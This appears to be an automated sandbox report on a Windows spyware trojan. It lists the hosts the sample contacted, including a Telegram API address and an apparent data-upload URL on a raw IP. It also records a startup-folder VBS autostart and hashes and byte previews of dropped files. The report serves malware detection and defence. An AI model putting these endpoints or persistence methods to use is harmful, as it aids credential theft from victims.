                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4175379546.0000000004437000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4175379546.0000000004405000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4175454469.00000000043C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4172452396.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4172080373.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      149.154.167.220
                                                                                                      		api.telegram.orgUnited Kingdom
                                                                                                      		62041TELEGRAMRUfalse
                                                                                                      104.21.16.1
                                                                                                      		reallyfreegeoip.orgUnited States
                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                      158.101.44.242
                                                                                                      		checkip.dyndns.comUnited States
                                                                                                      		31898ORACLE-BMC-31898USfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1588301
                                                                                                      Start date and time:2025-01-10 23:43:09 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 11s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:3i1gMM8K4z.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:ddadbda4f90dc1d05f3e78ac6e5009c2e6608137b60bce3427e25ffea1b4d944.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 97%
                                                                                                      • Number of executed functions: 57
                                                                                                      • Number of non-executed functions: 277
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: 3i1gMM8K4z.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      17:44:11API Interceptor12753694x Sleep call for process: RegSvcs.exe modified
                                                                                                      22:44:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      149.154.167.2202NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          104.21.16.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.kkpmoneysocial.top/86am/
                                                                                                                          JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                          158.101.44.242vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/
                                                                                                                          tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • checkip.dyndns.org/

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          checkip.dyndns.com2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 132.226.8.169
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 132.226.247.73
                                                                                                                          reallyfreegeoip.org2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.48.1
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.112.1
                                                                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.64.1
                                                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          api.telegram.org2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          TELEGRAMRU2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          CLOUDFLARENETUS2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.32.1
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.48.1
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 188.114.96.3
                                                                                                                          xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 104.26.12.205
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.112.1
                                                                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.96.1
                                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.80.1
                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.162.153
                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.223.109
                                                                                                                          ORACLE-BMC-31898US2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 193.122.6.168
                                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 158.101.44.242
                                                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 193.122.130.0
                                                                                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 158.101.44.242

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9ad2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 104.21.16.1
                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0e2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          • 149.154.167.220
                                                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          • 149.154.167.220

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Okeghem\ghauts.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1147904
                                                                                                                          Entropy (8bit):7.1731495033367105
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:cu6J33O0c+JY5UZ+XC0kGso6FaNAaW2Kh7ZClY9lnmWY:Gu0c++OCvkGs9FaNAaWphNCC1Y
                                                                                                                          MD5:1D0C53E42BD84B7B7CFABED7DAE7F570
                                                                                                                          SHA1:0B0DF40AFE9BED5720C361FE7ED63395E1A25F41
                                                                                                                          SHA-256:DDADBDA4F90DC1D05F3E78AC6E5009C2E6608137B60BCE3427E25FFEA1B4D944
                                                                                                                          SHA-512:9AB7671F48D5DBEB58C93B61998762ED91DA2F566421FF11F53EDFDB6A65AF0199FF4BB31647EC296CAE7F85BA7CFC71340FBB931E6A05FD5AA03A43F5026057
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                          Reputation:low
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....(Vg.........."..................}............@..................................z....@...@.......@.....................L...|....p.......................p...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...p...r..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\aut9727.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..

                                                                                                                          C:\Users\user\AppData\Local\Temp\autA34C.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..

                                                                                                                          C:\Users\user\AppData\Local\Temp\autDE23.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240744
                                                                                                                          Entropy (8bit):7.982774782035282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:tHujT6bLm2gO5yFVYkZeg9yqRI/FXJUasyvghJmWMZBTDn8sHyyedQ43XfFvR3Yy:tMW3YJ4lCwvmLKZxD1SDQ6uklGr+O/2
                                                                                                                          MD5:3EFEF33DE4B9A0746F48ED50D0329CA5
                                                                                                                          SHA1:C3827793FF34405CFE9960D58CF1A1FA9C93ECA2
                                                                                                                          SHA-256:6348A723FDA7F47D932D00E92F6E5FFC24228B6931F819AEDEEC3A078A3ECA25
                                                                                                                          SHA-512:888F7D9DF9C3001807E6DC3101E488599FA4DCBCA8B3472C6261AC37E8082FE6A5150965C06D48D106EDC12665EE7AF06B6062ADC7FC89ACD90E928B1DB7188A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:EA06.....[x5.=..E.U...n..B.Q.T...7..h.....X.U.T*...j .....X.U<s.......f1.E..>..nSi..9.V.3.,.o*.]...._,.K......M..;."{\..,fE].Y..m..7...}|..u..-.}..w..RoR.t..4..#3...a.N*.......I......>.G....._)..'[:H...R.d...h.....h....F..@....l.z..sV..&uj.j..-].@.EX...Q......V..)5..P.c4....)u..F.....*...2.R..1K...4...U@M;.T.1@.fmG.@.......F..&4.(....Y..........Y.Q.h..\.........Y.......aR.,.n5.$..7.M.2..[./..?...d...V..>....w..d.)........ .B...Oj`...J.J..2.,..X...5j,.aV.u.tjU.d...\....G..-....bW.5..J.l7...F...Vx.....2.f..8..0..&..#....3X.'.5..kjt.......v...0..i.^.+U...v_.>W.....W...-..N...'..M..e.....E..9.e...............(.....Z..u4ZF._].W..].>.V..+t..f............\..gi...........L.&..+...a.]..fqb..w1...{...y...9..\.4j5./....k.F...2M.ku...+ !..{7..}.k......x.j..aV....._............t..n....2.^....,b..T.Q\..r.[.OQ4.L*.LG/.o.67RJ..A.N{..d.!..Ph..h.....&:...)E..f........mF...H:.[.N.J.U.{....M...:.VM..n....Oc..`*.`......1k,..I.."....e...d...sY..%....;Z..w0.%..M.y..J5n..

                                                                                                                          C:\Users\user\AppData\Local\Temp\nondefinition

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):242688
                                                                                                                          Entropy (8bit):7.863716781433369
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:WfwUw6ewAKanQOmqYR8upGluho/Sn6+AWzXX0umqA7Tah45Dnz7QB:WDfet5nfYREAwS6+Bzn3iPm49z7QB
                                                                                                                          MD5:58412BC618CB35E18913D632DB5BFCDF
                                                                                                                          SHA1:1F83979BDB99C654A742F47CA514E621DCDF8E92
                                                                                                                          SHA-256:E7316A4ED2628FFE37FE57E711B0DD9F3B06706E3F269F8BB0C454DEBAE0265C
                                                                                                                          SHA-512:9C55E9D63F0E14F4CD99FBD2D4E82912A399B79CFDDA5E0F6914DE85599155611AD3CBD8A64B962BFDC9C8263DE420153AFC21843B114BB520809C0A2F293830
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
